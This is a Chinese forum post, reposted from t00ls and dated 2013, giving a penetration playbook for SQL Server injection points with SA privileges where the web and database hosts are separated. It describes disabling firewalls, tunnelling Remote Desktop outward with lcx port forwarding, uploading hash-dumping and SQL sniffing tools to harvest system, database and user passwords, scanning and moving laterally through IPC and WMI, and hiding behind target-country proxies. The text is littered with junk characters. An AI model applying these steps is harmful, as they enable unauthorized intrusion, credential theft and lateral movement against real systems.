当你碰到SA的注入点,可以执行命令,但是web与数据库分离,你都会怎么做呢,当数据库不服务器不能连接外网的时候,是不是只想着从web搞呢,这篇文章从t00ls转载过来,希望对大家sa权限的注入点数据库web分离提供一些渗透思路。) g+ F9 g5 |- X# I( R7 c) r6 d- K
; f: K0 ~& @+ ?" A% k. u$ S
$ A2 k: D% T( }! y1 }& Z* t, i t6 U: b* `
SA点,system权限,可执行命令,web和db分离.DB机器不上网(一般指中马不上线,lcx反弹不出)
4 b" K. O' z9 B+ B
' p$ a" m; {; Z- S C4 z: j5 Y' d8 R$ I$ v) T8 H) t
一、DB机有公网IP.
5 L7 z. {' g9 G5 @0 D/ e' ~# @- |4 L; T, \0 Y
1:执行命令把系统防火墙和ip策略停止,netstat -an找到3389端口尝试连接.0 y# Q7 t" D5 J
# |0 i, r1 e& \2 Z; ]
, o" e& E2 v* }: K8 N# r2:从内往外扫描.把命令行下的s扫描器转成vbs传上DB机器生成exe扫描外网一台做了端口策略的机器.这台外网机器开放所有端口.(可以到网上找这 样的 机器.) 如果扫描结果有开放端口,证明在这台DB机可以把3389转到外面机器.比如扫到80 那就lcx -slave ip 80 127.0.0.1 3389.
. u [, n$ K9 l: N$ E- f/ j/ i: @" |0 P# F& E/ G( ?
" f- f0 w! Q( G" R; ?+ `
3:尽量多拿密码.用vbs的方法上传gethash,sqlsniffer类的工具.拿到系统和mssql的密 码,数据库表的后台管理员密码,member表的最前几个用户密码.这些密码可以用来测试web后台,web的3389 ftp等.当然事先要对web机器完整扫描一遍. www.2cto.com1 {& S: B5 W* R+ t, Z) l
2 i8 F2 a) w" [. h; M. W- Y8 S; r. @. `
4,nmap扫描.用nmap扫描web和db机器的1-65535端口.如果发现db机器显示有closed的端口.那恭喜你,你可以lcx -tran 把3389转发到该端口直接登陆.firewalk也有类似功能.但对代理防火墙无用.5 ]/ @9 y6 f& M4 c
: n& J5 ^9 E5 y" L+ u+ P! A3 \' x$ V0 ]& D! s
\3 E/ r+ q* X+ F4 w6 ^二、DB机只有内网IP
' ?+ q, E' L1 H9 o. F4 v+ v5 ]3 B( x. l6 J. t7 b+ p' `
1:尽量多拿密码来net use到web机器.这个过程需要极大的耐心 , 拿密码尝试登陆web后台等.
7 Q0 ^: i7 p! R9 m( s4 u8 [ ]
6 [/ F' G7 A2 w9 ~
' z. Z ~5 A6 \9 V8 C* K2:停掉防火墙和IP策略再从内往外扫描.6 W6 @# ^- v% `) p- `, |
7 b2 h7 f& \7 I: h: r/ M. Y3 \. V0 A# ^6 J: x
3: ipconfig /dispalydns如果发现有公网的域名,极大可能是路由做了手脚.机会还是有的.
8 G: d+ X7 w+ S+ A& v& ?0 E
$ \0 K5 H2 L7 b8 Y* K0 W% B1 G9 R& X5 M7 u$ V# E' C
4:学会密码规律分析往往会有惊喜." z6 e; J5 n0 ~0 |
7 F( O- |% K b( o9 r/ R9 ~
# D$ t- W9 A7 Y6 `/ ?2 G5,在sa点里执行命令渗透内网,找可上网的机器.isql,ipc共享,wmi等( G- e* _( W3 K- K
7 f- ?, _2 X1 h
4 L- [# t" D/ S( ~. D2 P有些地区或国家会禁止别的国家连接一些端口,所以拥有目标国代理或VPN是很重要的 |
发表于 2013-2-16 21:46:01
收藏
支持
反对